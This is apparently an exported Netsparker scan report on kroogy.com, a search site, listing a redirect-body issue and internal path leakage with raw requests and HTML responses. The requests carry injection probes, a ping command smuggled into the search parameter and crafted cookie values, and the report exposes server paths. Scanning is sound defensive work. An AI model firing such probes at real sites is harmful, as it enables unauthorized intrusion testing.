Redirect Response BODY Is Too Large

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the response from the page returned an HTTP Redirect Status but output more information than usual. This generally indicates that after redirect, page did not finish the response as it was supposed to.

Impact

This can lead serious issues such authentication bypass in authentication required pages, in other pages it generally indicates a programming error.

Remedy

Finish the HTTP Response after you redirect the user.

In ASP.NET use Response.Redirect("redirected-page.aspx", true); instead of Response.Redirect("redirected-page.aspx", false); In PHP applications call exit(); after you redirect the user.
- /search/web

/search/web CONFIRMED

http://kroogy.com/search/web?search=%2527&type=web

Parameters

Parameter Type Value
search GET %27
type GET web

Request

GET /search/web?search=%2527&type=web HTTP/1.1
Referer: http://kroogy.com/search/web/LS%20magazine
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Cookie: language=8; region=AU-en; nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; region=%27%2BNSFTW%2B%27; PHPSESSID=totjukp6oqa5l5opadu8gndj05; language=%2A%2Fnetsparker%280x000055%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 14:12:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6,PleskLin
location: http://kroogy.com/search/arithmeticconversion?search=%2527&type=web
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 8094
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><SCRIPT LANGUAGE="JavaScript">function showcheckbox(){ if(document.getElementById('thumbshotcheck').checked==true) { SetCookie( 'thumbshot', 'on', 7); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display=""; } } else { SetCookie( 'thumbshot', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display="none"; }}}function showcheckbox1(){if(document.getElementById('quicklookcheck').checked==true) { SetCookie( 'qlook', 'on', 7); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display=""; document.getElementById("qlookframe"+i).style.display=""; } } else { SetCookie( 'qlook', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display="none"; document.getElementById("qlookframe"+i).style.display="none"; }}}</script><title>Kroogy Search - வலை - %27</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - வலை - %27"><meta name="keywords" content="Kroogy Search,search,search engine,%27,web"><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style></head><body><table cellpadding="0" cellspacing="0" border="0" class="headertable" width="100%"><tr><td class="headerlinkstd" align="right"><span style="float:left;"><form name="displaysettings" id="displaysettings" enctype="multipart/form-data" method="post" action="http://kroogy.com/"> <input type="checkbox" name="thumbshotcheck" id="thumbshotcheck" checked="checked" onchange="javascript:showcheckbox()" > &nbsp;பெருவிரல்சுவடை காமி
&nbsp;&nbsp; <input type="checkbox" name="quicklookcheck" id="quicklookcheck" checked="checked" onchange="javascript:showcheckbox1()"> &nbsp;உள��பார்வை காமி </form></span><a class="headerlink" href="http://kroogy.com/index/advanced">மேம்பட்ட தேடல்</a> | <a class="headerlink" href="http://kroogy.com/">Kroogy Search முகப்பு</a></td></tr><tr><td><style><!---->.links{font-size:11px;color: grey;width: 125px;}.outermainadtd1{padding-top:10px;padding-left:0px;padding-right:10px;vertical-align:top;}.resultsetwrappertd{padding-right:50px;}</style><script src="js/qlook.js" language="JavaScript"></script><SCRIPT LANGUAGE="JavaScript">function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();}function urlencode(str){return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL){day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr> <td align="left" class="outermainlogotd" ><a alt="Kroogy Search முகப்பு" title="Kroogy Search முகப்பு" href="http://kroogy.com/"> <img src="userdata/resultpagelogo.jpg" border="0"> </a></td> <td align="left" class="outermaintabtd"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; } else { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; } }}function GetXmlHttpObject(){if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari return new XMLHttpRequest(); }if (window.ActiveXObject) { // code for IE6, IE5 return new ActiveXObject("Microsoft.XMLHTTP"); }return null;}function setvaluefortb(text){ document.getElementById('search').value=text; document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.searchform.submit();}document.body.onclick= getMouseXY;function getMouseXY(e) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px";}var searchtext="";var counter=0;var old_char_count=0;var total_result_count=10;function keymovement(evt,textval) { var charCode = (evt.which) ? evt.which : event.keyCode //alert(charCode); if(charCode==40) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter+1; if(!document.getElementById('livesearch_a_'+counter)) { counter=0; } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==38) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter-1; if(!document.getElementById('livesearch_a_'+counter) && counter!=0) { for(i=total_result_count;i>0;i--) { if(document.getElementById('livesearch_a_'+i)) { counter=i; break; } } } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==37 || charCode==39 || charCode==17 || charCode==18) { } else if(charCode==27 ) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.getElementById('search').value=searchtext; } else if(charCode==13 ) { document.searchform.submit(); } else { searchtext=document.getElementById('search').value; showResult(textval); } }</script><style type="text/css"></style><form name="searchform" id="searchform" enctype="multipart/form-data" method="POST" action="http://kroogy.com/search/redir"><div class="containerdiv"><table cellpadding="0 " cellspacing="0" class="containertable"><tr><td class="containertabtd"><div class="tabsdiv"><div class="tabsdivinner"><table cellpadding="0" cellspacing="0" class="tabstable"><tr class="tabstr"> <td class="activetableft">&nbsp;</td> <td nowrap="nowrap" class="activetabcenter"><a class="activetablink" href="javascript:Determine('web','1');"><span>வலை</span></a></td> <td class="activetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('images','0');"><span>படம்</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('videos','0');"><span>ஒளி</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('news','0');"><span>செய்தி</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('sports','0');"><span>விளையாட்டு</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Audio','0');"><span>ஒலி</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Forum','0');"><span>போரும்</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Blog','0');"><span>இடுகை</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Wiki','0');"><span>விக்கிபீடியா</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('PDF','0');"><span>பிடியஃப்</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Amazon','0');"><span>Amazon</span></a></td> <td class="inactivetabright">&nbsp;</td></tr></table></div></div></td></tr><tr><td class="containersearchtd"><div class="searchdiv"><table cellpadding="0" cellspacing="0" class="searchtable" border="0"><tr><td class="searchtdleft">&nbsp;</td><td nowrap="nowrap" class="searchtdcenter" dir="ltr"><table cellpadding="0" cellspacing="0"><tr><td colspan="3" > <span class="searchfieldspan"><input type="hidden" name="type" value="web"><input autocomplete="off" onKeyUp="javascript:keymovement(event,this.value);" name="search" id="search" type="text" value="%27" size="50" class="searchfield"></span><span class="searchbuttonspan"><input type="submit" name="searchbutton" value="தேடு" class="searchbutton"></span><span class="luckybuttonspan"><input type="submit" name="lucky" value="அதிர்ஷ்டம் என் பக்கம்" class="luckybutton"></span></td></tr><tr><td style="overflow:visible; width:380px;" valign="top" ><div id="livesearch" class="livesearch" ></div></td><td>&nbsp;</td><td>&nbsp;</td></tr></table></td><td class="searchtdright">&nbsp;</td></tr></table></div></td></tr></table></div></form> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> </td> </tr></table><table cellpadding="0" cellspacing="0" border="0" class="outermaincontainer"> <tr> <td colspan="2"> <table border="0" cellpadding="0" cellspacing="0" class="totaltable"> <tr> <td class="totaltd" align="left"><span class="totaltext">க்கான ஏறக்குறைய <span class="totalresults">553,000,000</span> இல் <span class="resultcountstart">1</span>-<span class="resultcountend">10</span> முடிவுகள்</span></td> <td class="typesearchtd" align="right"><span class="typesearchtext">தேடு வலை</span></td> </tr> </table> </td> </tr><tr><td height="1px" width="70%&qu..
[Possible] Internal Path Leakage (*nix)

[Possible] Internal Path Leakage (*nix)

2 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.

Remediation

External References

- /search/web/Linkbucks%20vlad%20modelS

/search/web/Linkbucks%20vlad%20modelS

http://kroogy.com/search/web/Linkbucks%20vlad%20modelS

Identified Internal Path(s)

/home/drpc/public_html/DRPC-net/kdvix

Request

GET /search/web/Linkbucks%20vlad%20modelS HTTP/1.1
Referer: http://kroogy.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; language=8
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:34:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6,PleskLin
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 11414
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><SCRIPT LANGUAGE="JavaScript">function showcheckbox(){ if(document.getElementById('thumbshotcheck').checked==true) { SetCookie( 'thumbshot', 'on', 7); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display=""; } } else { SetCookie( 'thumbshot', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display="none"; }}}function showcheckbox1(){if(document.getElementById('quicklookcheck').checked==true) { SetCookie( 'qlook', 'on', 7); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display=""; document.getElementById("qlookframe"+i).style.display=""; } } else { SetCookie( 'qlook', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display="none"; document.getElementById("qlookframe"+i).style.display="none"; }}}</script><title>Kroogy Search - வலை - Linkbucks vlad modelS</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - வலை - Linkbucks vlad modelS"><meta name="keywords" content="Kroogy Search,search,search engine,Linkbucks vlad modelS,web"><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style></head><body><table cellpadding="0" cellspacing="0" border="0" class="headertable" width="100%"><tr><td class="headerlinkstd" align="right"><span style="float:left;"><form name="displaysettings" id="displaysettings" enctype="multipart/form-data" method="post" action="http://kroogy.com/"> <input type="checkbox" name="thumbshotcheck" id="thumbshotcheck" checked="checked" onchange="javascript:showcheckbox()" > &nbsp;பெருவிரல்சுவடை காமி
&nbsp;&nbsp; <input type="checkbox" name="quicklookcheck" id="quicklookcheck" checked="checked" onchange="javascript:showcheckbox1()"> &nbsp;உள்பார்வை காமி </form></span><a class="headerlink" href="http://kroogy.com/index/advanced">மேம்பட்ட தேடல்</a> | <a class="headerlink" href="http://kroogy.com/">Kroogy Search முகப்பு</a></td></tr><tr><td><style><!--.totaltd
{
border-bottom:#045c97;
border-bottom-style:solid;
border-bottom-width:1px;
background-color:#e4f2fc;
height:20px;
padding-left:10px;
padding-right:10px;

}
.typesearchtd
{
border-bottom:#045c97;
border-bottom-style:solid;
border-bottom-width:1px;
background-color:#e4f2fc;
height:20px;
padding-left:10px;
padding-right:10px;

}
.conversiontable
{
width:100%;
}
.conversiontd
{
padding-left:10px;
padding-right:10px;
padding-bottom:20px;
}
.conversionkeyword
{
font-size:18px;
font-style:italic;
}
.conversiontarget
{
font-size:18px;
font-style:italic;
}


.viewmorelinktd
{
padding-bottom:15px;
}
.viewmorelink
{
font-size:12px;
}
.showimagetd
{
padding-bottom:5px;
}

.imagepreviewlinkweb
{
font-size:12px;
}

.resultcountstart
{
font-size:13px;
font-weight:bold;
}

.resultcountend
{
font-size:13px;
font-weight:bold;
}
.totalresults
{
font-size:13px;
font-weight:bold;
}
.keywordintotal
{
font-size:13px;
font-weight:bold;
}


.thumbshotimage
{
border: 1px solid black;

}

.outermaincontainer
{
align:center;
width:100%;
}

.outermainresulttd
{
vertical-align:top;
width:850px;
padding:10px;
}
outermainimageresulttd
{
vertical-align:top;
width:100%;
padding:10px;
}
.totaltable
{
width:100%;
height:30px;
padding-left:0px;
font-family:Verdana, Arial, Helvetica, sans-serif;
}
.totaltext
{

font-size:12px;


}
.typesearchtext
{
text-transform: capitalize;
font-size:12px;
font-weight:bold;
}
.spelltable
{
height:30px;
width:100%;
font-family:Verdana, Arial, Helvetica, sans-serif;
padding:20px;
}
.spellsuggestiontext
{
padding-left:10px;
padding-right:10px;
font-size:13px;
font-weight:bold;

}
.spelllink
{
font-weight:bold;
font-size:13px;
color:green;
}
.resultsetwrapper
{
width:100%;
}
.resultsetwrappertd
{

}
.resulttable
{
width:100%;
}
.thumbshotimage
{
width:100px;
heigth:100px;
}
.resulttd
{
width:100%;
valign:top;
font-family:Verdana, Arial, Helvetica, sans-serif;
}
.resulttitle
{
font-size:13px;
valign:top;
font-family:verdana,Arial, Helvetica, sans-serif;
}
.resulttitle a:hover
{
color:red;
}
.resultlink
{

}
.newwindowimage
{
width:11px;
height:11px;
}
.resultdescription
{
font-size:11px;
}
.resulturl
{
font-size:12px;
color:green;
}
.emailfrndlink
{
font-size:12px;
}
.seperationtd
{
height:10px;
}
.footerpagetable
{
width:100%;
}
.relatedkeywordstable
{
width:100%;
}

.footerpagetd a
{
text-decoration:none;
font-size:14px;
color:#0368ab;
border-style:solid;
border-width:1px;
border-color:#a4d7fa;
padding-left:8px;
padding-right:8px;
padding-top:2px;
padding-bottom:2px;
font-family:Arial, Helvetica, sans-serif;
}
.footerpagetd a:hover
{
text-decoration:none;
font-size:14px;
color:#fff;
border-style:solid;
border-width:1px;
border-color:#a4d7fa;
padding-left:8px;
padding-right:8px;
padding-top:2px;
padding-bottom:2px;
background-color:#0368ab;
}


.footerpagetext
{
font-size:15px;
color:black;
font-weight:bold;
}
.footerpagetd
{
padding:10px;
height:40px;


}
.relatedkeywordstd
{
height:40px;
padding-left:10px;
padding-right:10px;
font-family:Verdana, Arial, Helvetica, sans-serif;
}
.relatedkeywordmessage
{
font-size:12px;
font-weight:bold;
}
.relatedkeywordlink
{
font-size:12px;
font-weight:bold;
}

.imagedomain
{

font-size:10px;
color:green;
line-height:15px;
}
.imagedetails
{

font-size:10px;
line-height:15px;
font
}
.imagetitle
{

font-size:11px;
line-height:25px;
}
.imagepreview
{
font-size:11px;
}
.imageresulttd
{
padding-left:10px;
padding-bottom:15px;
padding-right:10px;
font-family:Verdana;
}

.videoresulttd
{
padding-bottom:15px;
padding-left:10px;
padding-right:10px;
font-family:Verdana;
}
.videotitle
{

font-size:11px;
line-height:20px;
font-weight:bold;

}
.videoduration
{
font-size:10px;
color:green;
line-height:15px;
}
.videopublishedon
{
font-size:10px;
line-height:15px;
}
.thumbshottd
{
padding-bottom:5px;
padding-right:10px;
vertical-align:top;
padding-left:10px;
}

.imageresultsinwebtd
{
padding-left:10px;
vertical-align:bottom;

}
.imageresultinweb
{
border: 1px solid black;
max-height:80px;
}
.imageresultinwebviewmorelink
{
font-size:12px;
font-weight:bold;
}
.arithmeticconversiontd
{
padding-left:10px;
padding-right:10px;
padding-top:10px;
font-size:14px;
font-weight:bold;
}
.qlook
{
font-size:12px;
}

.emaillinkimage
{
width:12px;
height:12px;
}
.arithmeticconversionkeyword
{
font-size:16px;
font-weight:bold;
}

.arithmeticcoversionresult
{
font-size:16px;
font-weight:bold;

}

.noresulttext
{
font-size:12px;
font-weight:bold;

}
.noresulttd
{
padding-top:15px;
padding-left:15px;
align-text:center;
padding-right:15px;
}
.quicklooktd
{
padding-left:10px;
}
.imageresultinwebviewmorelinktd
{
padding-bottom:15px;
padding-left:10px;
padding-right:10px;
}
.outermainadtd
{
padding-top:20px;
padding-left:10px;
padding-right:10px;
vertical-align:top;
}

.amazonnavigationoptiontext
{

font-size:12px;
font-weight:bold;

}
.amazoncountrytd
{
padding-top:10px;
}
.amazoncategorytd
{
padding-top:10px;
}

.ebaythumbshotimage
{
border: 1px solid black;
width:80px;
}

.amazonthumbshotimage
{
width:55px;
border: 1px solid black;
}
.box
{
background-color: #F0F8FF;
}
.border
{
border-left-color: #d3e1f9;
border-right-color: #d3e1f9;
}/* CSS Document */

.body td, tr
{
font-family:Verdana, Arial, Helvetica, sans-serif;
}

#countries,#optionallanguage,#themegroup
{
background-color:#e4f2fc;
height:22px;
border-width:1px;
border-style:solid;
Border-color:#aaaaaa;

}

.advancedsearchsubtitletd
{
padding-bottom:15px;
padding-top:10px;
padding-left:5px;
padding-right:5px;
}
.advancedsearchtexttd
{
width:250px;
padding-left:5px;
height:40px;
padding-right:5px;

}
.advancedsearchfieldtd
{
padding-bottom:15px;
}
.advancedsearchtextstyle
{
font-size:12px;

}
.advancedsearchtable
{
width:700px;
margin-top:10px;
padding-top:5px;
padding-bottom:15px;

}
.advancedsearchexampletext
{
font-size:12px;
}

.advancedsearchtitletable
{
width:700px;
margin-top:20px;
background-color:#e1e1e1;
padding-top:15px;
padding-bottom:15px;
}
.advancedsearchtitletd
{
padding-left:5px;
height:30px;
text-align:center;
background-color:#e4f2fc;
width:100%;
border:#045c97;
border-style: solid;
border-width: 1px;


}

.advancedsearchsubtitletext
{
font-size:12px;
font-weight:bold;
}

.footertable
{
width:100%;
padding-top:15px;


}
.footertext
{
font-size:12px;
}
.footertd
{
padding-left:10px;
}
.headerlinkstd
{
width:100%;

padding-right:5px;
padding-left:5px;
padding-top:2px;
font-size:13px;
padding-bottom:2px;
border-bottom:#045c97;
background-color: #e4f2fc;
border-bottom-style: solid;
border-bottom-width: 1px;
}

.headerlinkstd a ,.headerlinkstd a:visited
{
color:#000000;
font-weight:bold;
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:11px;

}

.languagetd
{
padding-left:5px;
font-size:12px;
height:30px;
}
.headerlink
{
font-size:12px;
}
.themetd
{
padding-left:5px;
padding-top:2px;
font-size:13px;
padding-bottom:2px;
border-bottom:#045c97;
background-color: #e4f2fc;
border-bottom-style: solid;
border-bottom-width: 1px;
color:#000;

}
.cloudtagtd
{
margin-top:20px;
padding-top:5px;
padding-left:5px;
border-color:#77c3fa;
border-width:1px;
border-style:solid;
padding-bottom:5px;

padding-left:5px;
padding-right:5px;

}

.cloudtagtd a
{
font-family:Verdana, Arial, Helvetica, sans-serif;
}
.generallinks
{
font-size:12px;
}
.opendirectorytd
{
padding-top:10px;
}
.advancetd
{
height:20px;
padding-left:5px;
font-size:13px;
}

.footerlinktd
{
height:15px;
border-top: #045c97;
padding-top:5px;

border-top-style: solid;
border-top-width: 1px;
}
.stdpagetitle
{
font-size:14px;
font-weight:bold;

}
.emailafrndurltd , .emaillinkdesctd
{
padding-top;5px;
background-color:#e4f2fc;
padding-bottom:5px;
}
.emailafrndurl
{
font-size:12px;
font-weight:bold;
}
.outermainoptionstd
{
padding-left:15px;
padding-right:15px;
padding-top:5px;
padding-bottom:5px;
font-size:12px;
background: url(images/themes/modern_blue/box.gif);
background-position:bottom;
background-repeat:repeat-x;

}
.outermainlogotd
{
width:5%;
padding-top:5px;
padding-bottom:5px;
padding-left:15px;
padding-right:15px;

background: url(images/themes/modern_blue/box.gif);
background-position:bottom;
background-repeat:repeat-x;
}
.outermaintabtd
{

padding-top:10px;
padding-bottom:5px;
padding-left:0px;
padding-right:0px;
vertical-align:bottom;


background: url(images/themes/modern_blue/box.gif);
background-position:bottom;
background-repeat:repeat-x;
}
#mandatory
{
color:red;
font-size:10px;
font-weight:bold;
vertical-align:top;
padding-left:2px;
padding-right:2px;
}
#morelanguagesdiv
{
font-size:11px;
}
.advancetd a
{

font-size:11px;

}



.generatesearchboxtable
{
width:900px;
margin-top:10px;
padding-top:5px;
padding-bottom:15px;

}


.generatesearchboxtitletd
{
padding-left:5px;
height:30px;
text-align:center;
background-color:#e4f2fc;
width:100%;
border:#045c97;
border-style: solid;
border-width: 1px;


}

.generatesearchboxpagetitle
{
font-size:14px;
font-weight:bold;

}


.generatesearchboxtexttd
{

padding-left:5px;
height:40px;
padding-right:5px;

}
.generatesearchboxtextstyle
{
font-size:12px;

}


.generatesearchboxsubtitletd
{
padding-bottom:15px;
padding-top:10px;
padding-left:5px;
padding-right:5px;
}

.generatesearchboxsubtitletext
{
font-size:12px;

font-weight:bold;


}


.generatesearchboxenginestextstyle
{
font-size:12px;
text-transform: capitalize;

}
-->.links{font-size:11px;color: grey;width: 125px;}.outermainadtd1{padding-top:10px;padding-left:0px;padding-right:10px;vertical-align:top;}.resultsetwrappertd{padding-right:50px;}</style><script src="js/qlook.js" language="JavaScript"></script><SCRIPT LANGUAGE="JavaScript">function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();}function urlencode(str){return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL){day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr> <td align="left" class="outermainlogotd" ><a alt="Kroogy Search முகப்பு" title="Kroogy Search முகப்பு" href="http://kroogy.com/"> <img src="userdata/resultpagelogo.jpg" border="0"> </a></td> <td align="left" class="outermaintabtd"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementByI..
- /search/web

/search/web

http://kroogy.com/search/web?search=%27%26+ping+-n+26+127.0.0.1+%26&type=web&fl=0

Identified Internal Path(s)

/etc/relsov.conf

Request

GET /search/web?search=%27%26+ping+-n+26+127.0.0.1+%26&type=web&fl=0 HTTP/1.1
Referer: http://kroogy.com/search/redir
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Cookie: language=8; region=AU-en; nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; region=%27%2BNSFTW%2B%27; PHPSESSID=totjukp6oqa5l5opadu8gndj05; language=%2A%2Fnetsparker%280x000055%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 13:05:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6,PleskLin
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 9129
Connection: close
Content-Type: text/html


